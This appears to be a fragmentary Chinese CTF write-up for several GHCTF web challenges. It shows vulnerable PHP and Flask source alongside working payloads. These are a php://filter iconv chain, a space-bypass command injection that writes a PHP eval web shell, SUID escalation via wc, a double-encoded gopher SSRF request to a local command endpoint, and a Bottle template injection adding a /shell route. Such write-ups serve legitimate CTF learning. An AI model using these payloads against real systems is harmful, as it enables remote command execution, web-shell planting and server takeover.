"file": "php://filter/read=zlib.inflate|zlib.inflate|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.latin1.latin1|dechunk|convert.iconv.UTF-8.ISO-2022-CN-EXT|convert.quoted-printable-decode|convert.iconv.latin1.latin1/resource=data:text/plain;base64,e3vXt%2b/NNlG2gL73WSu0QrdmLXC8806umlMwJ0t6ZsqUo6m8M1Pkd4rEC9yQY81grntgqbBPO2zz1%2bDpK1ZmsTLgBQlcp4uOhOaFr0wOy994PeqZ2Ek2Rvw6ZhzZJFM49XboqxlXo99snbbTdZMjfg0Maht13GOelk21SvsqVr02NW9ijgABK07V3nyk9VWr9EzW2/yG94/D9svW/Pxxetv11P8rfm9%2b917%2b9%2b3n8qULPY9VLX3/udtNxZ6fgAv%2b3LTN/vLphpvk5tLuv5vfyZfW231/Xlv//8Z9u%2b9Rvyuu2NXeq/v9c9rr%2bP3x8ie38%2bA37P/03/rXuU%2b83x%2bjr7D/v02a/fUb99/9/lxbb/erYvXvte%2b%2bp%2b7/f4F/nv2b89e/Xv9ut/fvjvvx1w/euh80L7n27etf94/2/0v79Hybvf160/zff2v3138rftb%2b%2bEzl2u3Xp77e%2bu/4322x6b/vXN9eW/um3%2bbc5rvr/ketm/rdrvbJqevbuZ9avpf/%2b%2bfvj8e7wuKeVq7dH3s8/76b3Hfv9X%2bd/gra1dfe6v9/N9q0532Ry6fPbPj9YdCbCgvlXqPN9f8fv5%2bYQygg2z539Jgu3ioXPcXT5VL9qOJRxaOK6ay44aXu1mM%2b/bt7ltf2bnLpTJEmYLZP/krTtKo7qTZvs6eoeqncJqA8ocp7reHlx3qPM%2bMX6wQq3SRQiDBcjnolFr7yo%2b3db8r55qem/1j55/X6/3%2biNQUTrQk5LHtldMzSY99LbvdLPe12bXlLQL3B2qV5hVOl7l/Otc%2baoi8m%2bJ8RAA=="
}
data = {
"a": "TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak",
"b": "TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak"
}
response = requests.post(url, params=params, data=data)
print(response.text)GetShell
< ?php
highlight_file(__FILE__);
class ConfigLoader {
private $config;
public function __construct() {
$this->config = [
'debug' => true,
'mode' => 'production',
'log_level' => 'info',
'max_input_length' => 100,
'min_password_length' => 8,
'allowed_actions' => ['run', 'debug', 'generate']
];
}
public function get($key) {
return $this->config[$key] ?? null;
}
}
class Logger {
private $logLevel;
public function __construct($logLevel) {
$this->logLevel = $logLevel;
}
public function log($message, $level = 'info') {
if ($level === $this->logLevel) {
echo "[LOG] $message\n";
}
}
}
class UserManager {
private $users = [];
private $logger;
public function __construct($logger) {
$this->logger = $logger;
}
public function addUser($username, $password) {
if (strlen($username) < 5) {
return "Username must be at least 5 characters";
}
if (strlen($password) < 8) {
return "Password must be at least 8 characters";
}
$this->users[$username] = password_hash($password, PASSWORD_BCRYPT);
$this->logger->log("User $username added");
return "User $username added";
}
public function authenticate($username, $password) {
if (isset($this->users[$username]) && password_verify($password, $this->users[$username])) {
$this->logger->log("User $username authenticated");
return "User $username authenticated";
}
return "Authentication failed";
}
}
class StringUtils {
public static function sanitize($input) {
return htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
}
public static function generateRandomString($length = 10) {
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length / strlen($x)))), 1, $length);
}
}
class InputValidator {
private $maxLength;
public function __construct($maxLength) {
$this->maxLength = $maxLength;
}
public function validate($input) {
if (strlen($input) > $this->maxLength) {
return "Input exceeds maximum length of {$this->maxLength} characters";
}
return true;
}
}
class CommandExecutor {
private $logger;
public function __construct($logger) {
$this->logger = $logger;
}
public function execute($input) {
if (strpos($input, ' ') !== false) {
$this->logger->log("Invalid input: space detected");
die('No spaces allowed');
}
@exec($input, $output);
$this->logger->log("Result: $input");
return implode("\n", $output);
}
}
class ActionHandler {
private $config;
private $logger;
private $executor;
public function __construct($config, $logger) {
$this->config = $config;
$this->logger = $logger;
$this->executor = new CommandExecutor($logger);
}
public function handle($action, $input) {
if (!in_array($action, $this->config->get('allowed_actions'))) {
return "Invalid action";
}
if ($action === 'run') {
$validator = new InputValidator($this->config->get('max_input_length'));
$validationResult = $validator->validate($input);
if ($validationResult !== true) {
return $validationResult;
}
return $this->executor->execute($input);
} elseif ($action === 'debug') {
return "Debug mode enabled";
} elseif ($action === 'generate') {
return "Random string: " . StringUtils::generateRandomString(15);
}
return "Unknown action";
}
}
if (isset($_REQUEST['action'])) {
$config = new ConfigLoader();
$logger = new Logger($config->get('log_level'));
$actionHandler = new ActionHandler($config, $logger);
$input = $_REQUEST['input'] ?? '';
echo $actionHandler->handle($_REQUEST['action'], $input);
} else {
$config = new ConfigLoader();
$logger = new Logger($config->get('log_level'));
$userManager = new UserManager($logger);
if (isset($_POST['register'])) {
$username = $_POST['username'];
$password = $_POST['password'];
echo $userManager->addUser($username, $password);
}
if (isset($_POST['login'])) {
$username = $_POST['username'];
$password = $_POST['password'];
echo $userManager->authenticate($username, $password);
}
$logger->log("No action provided, running default logic");
} [LOG] No action provided, running default logic
#可以看到CommandExecutor很危险,直接exec,还有get会有一个action和input可传会进ActionHandler->handle();当action是run时,会创建InputValidator实例,检查输入长度是否超过100。如果通过验证,就调用CommandExecutor的execute方法.
?action=run&input=echo${IFS}"<?php${IFS}eval(\$_POST[pass]);?>"${IFS}>pass.php?action=run&input=echo${IFS}"< ?php${IFS}eval(\$_POST[pass]);?>"${IFS}>pass.php
Linux提权-suid相关提权思路 - Yuy0ung - 博客园
利用命令均可在这个网站上查询:GTFOBins,这里不再赘述
so,在里面搜wc,很容易就搜到了wc | GTFOBins
belike
但要注意观察文档中的是在./wc,我们的是在/var/www/html/wc里,改一下。
Goph3rrr
from flask import Flask, request, send_file, render_template_string
import os
from urllib.parse import urlparse, urlunparse
import subprocess
import socket
import hashlib
import base64
import random
app = Flask(__name__)
BlackList = [
"127.0.0.1"
]
@app.route('/')
def index():
return '''
<html>
<head>
<style>
body {
background-image: url('d‘)/* 背景图像 */
background-size: cover; /* 背景图片覆盖整个页面 */
height: 100vh; /* 页面高度填满浏览器窗口 */
display: flex;
justify-content: center; /* 水平居中 */
align-items: center; /* 垂直居中 */
color: white; /* 字体颜色 */
font-family: Arial, sans-serif; /* 字体 */
text-align: center; /* 文字居中 */
}
h1 {
font-size: 50px;
transition: transform 0.2s ease-in-out; /* 设置浮动效果过渡时间 */
}
h1:hover {
transform: translateY(-10px); /* 向上浮动 */
}
</style>
</head>
<body>
<h1>Hello Ctfer!!! Welcome to the GHCTF challenge! (≧∇≦)</h1>
</body>
</html>
'''
@app.route('/Login', methods=['GET', 'POST'])
def login():
junk_code()
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
if username in users and users[username]['password'] == hashlib.md5(password.encode()).hexdigest():
return b64e(f"Welcome back, {username}!")
return b64e("Invalid credentials!")
return render_template_string("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #f8f9fa;
}
.container {
max-width: 400px;
margin-top: 100px;
}
.card {
border: none;
border-radius: 10px;
box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
}
.card-header {
background-color: #007bff;
color: white;
text-align: center;
border-radius: 10px 10px 0 0;
}
.btn-primary {
background-color: #007bff;
border: none;
}
.btn-primary:hover {
background-color: #0056b3;
}
</style>
</head>
<body>
<div class="container">
<div class="card">
<div class="card-header">
<h3>Login</h3>
</div>
<div class="card-body">
<form method="POST">
<div class="mb-3">
<label for="username" class="form-label">Username</label>
<input type="text" class="form-control" id="username" name="username" required>
</div>
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input type="password" class="form-control" id="password" name="password" required>
</div>
<button type="submit" class="btn btn-primary w-100">Login</button>
</form>
</div>
</div>
</div>
</body>
</html>
""")
@app.route('/Gopher')
def visit():
url = request.args.get('url')
if url is None:
return "No url provided :)"
url = urlparse(url)
realIpAddress = socket.gethostbyname(url.hostname)
if url.scheme == "file" or realIpAddress in BlackList:
return "No (≧∇≦)"
result = subprocess.run(["curl", "-L", urlunparse(url)], capture_output=True, text=True)
#urlunparse 是 urllib.parse 模块中的函数,用于将 urlparse 解析后的 URL 对象重新组合成 URL 字符串。
return result.stdout
@app.route('/RRegister', methods=['GET', 'POST'])
def register():
junk_code()
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
if username in users:
return b64e("Username already exists!")
users[username] = {'password': hashlib.md5(password.encode()).hexdigest()}
return b64e("Registration successful!")
return render_template_string("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Register</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #f8f9fa;
}
.container {
max-width: 400px;
margin-top: 100px;
}
.card {
border: none;
border-radius: 10px;
box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
}
.card-header {
background-color: #28a745;
color: white;
text-align: center;
border-radius: 10px 10px 0 0;
}
.btn-success {
background-color: #28a745;
border: none;
}
.btn-success:hover {
background-color: #218838;
}
</style>
</head>
<body>
<div class="container">
<div class="card">
<div class="card-header">
<h3>Register</h3>
</div>
<div class="card-body">
<form method="POST">
<div class="mb-3">
<label for="username" class="form-label">Username</label>
<input type="text" class="form-control" id="username" name="username" required>
</div>
<div class="mb-3">
<label for="password" class="form-label">Password</label>
<input type="password" class="form-control" id="password" name="password" required>
</div>
<button type="submit" class="btn btn-success w-100">Register</button>
</form>
</div>
</div>
</div>
</body>
</html>
""")
@app.route('/Manage', methods=['POST'])
def cmd():
if request.remote_addr != "127.0.0.1":
return "Forbidden!!!"
if request.method == "GET":
return "Allowed!!!"
if request.method == "POST":
return os.popen(request.form.get("cmd")).read()
@app.route('/Upload', methods=['GET', 'POST'])
def upload_avatar():
junk_code()
if request.method == 'POST':
username = request.form.get('username')
if username not in users:
return b64e("User not found!")
file = request.files.get('avatar')
if file:
file.save(os.path.join(avatar_dir, f"{username}.png"))
return b64e("Avatar uploaded successfully!")
return b64e("No file uploaded!")
return render_template_string("""
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Upload Avatar</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #f8f9fa;
}
.container {
max-width: 400px;
margin-top: 100px;
}
.card {
border: none;
border-radius: 10px;
box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
}
.card-header {
background-color: #dc3545;
color: white;
text-align: center;
border-radius: 10px 10px 0 0;
}
.btn-danger {
background-color: #dc3545;
border: none;
}
.btn-danger:hover {
background-color: #c82333;
}
</style>
</head>
<body>
<div class="container">
<div class="card">
<div class="card-header">
<h3>Upload Avatar</h3>
</div>
<div class="card-body">
<form method="POST" enctype="multipart/form-data">
<div class="mb-3">
<label for="username" class="form-label">Username</label>
<input type="text" class="form-control" id="username" name="username" required>
</div>
<div class="mb-3">
<label for="avatar" class="form-label">Avatar</label>
<input type="file" class="form-control" id="avatar" name="avatar" required>
</div>
<button type="submit" class="btn btn-danger w-100">Upload</button>
</form>
</div>
</div>
</div>
</body>
</html>
""")
@app.route('/app.py')
def download_source():
return send_file(__file__, as_attachment=True)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000)Python中urllib.parse 里面的 urlparse 方法理解和使用 - AlphaGeek - 博客园
重定向和绕过都不行,有个urlparse,还需要是8000端口
内层Gopher协议+外层GET请求共两次编码,但要注意:
需要注意的是,
quote()函数默认只对 ASCII 字符进行编码,对于非 ASCII 字符(如中文),你需要指定safe=''和encoding='utf-8'参数,以确保所有字符都被正确编码。
import urllib.parse
# 原始 HTTP 请求(换行符为 \n)
raw_request = """POST /Manage HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
cmd=env
"""
# 对换行符和特殊字符进行编码
encoded_request = urllib.parse.quote(raw_request, safe='').replace('%0A', '%250A').replace('%20', '%2520').replace('%3A', '%253A')
# 拼接 Gopher URL
gopher_url = f"gopher://127.0.0.2:8000/_{encoded_request}"
print(gopher_url)
#gopher://127.0.0.2:8000/_POST%2520%2FManage%2520HTTP%2F1.1%250AHost%253A%2520127.0.0.1%253A8000%250AContent-Type%253A%2520application%2Fx-www-form-urlencoded%250AContent-Length%253A%25207%250A%250Acmd%3Denv%250Aso,还是用工具吧
/Gopher?url=gopher://127.0.0.2:8000/_POST%2520%252FManage%2520HTTP%252
F1.1%250Ahost%253A127.0.0.1%250AContent-Type%253Aapplication%252Fx-www-for
m-urlencoded%250AContent-Length%253A7%250A%250Acmd%253Denv
/Gopher?url=gopher://0.0.0.0:8000/_POST%2520%252FManage%2520HTTP%252
F1.1%250Ahost%253A127.0.0.1%250AContent-Type%253Aapplication%252Fx-www-for
m-urlencoded%250AContent-Length%253A7%250A%250Acmd%253Denv127.0.0.1 与 127.0.0.2 这两个 IP 地址的区别-CSDN博客
0.0.0.0详解_0.0.0.0是什么ip地址-CSDN博客
Message in a Bottle plus
在python⾥%print这本身就是⼀个错误的语法,为了让他可以通过语法检测 然⽽语法检测这种东⻄肯定针对的是代码,那么我们将他变成字符串就可以了,⽤引号包裹就可以绕过ast的检测
'''
% from bottle import Bottle, request
% app=__import__('sys').modules['__main__'].__dict__['app']
% app.route("/shell","GET",lambda :__import__('os').popen(request.params.get('lalala')).read())
'''建议用burp发
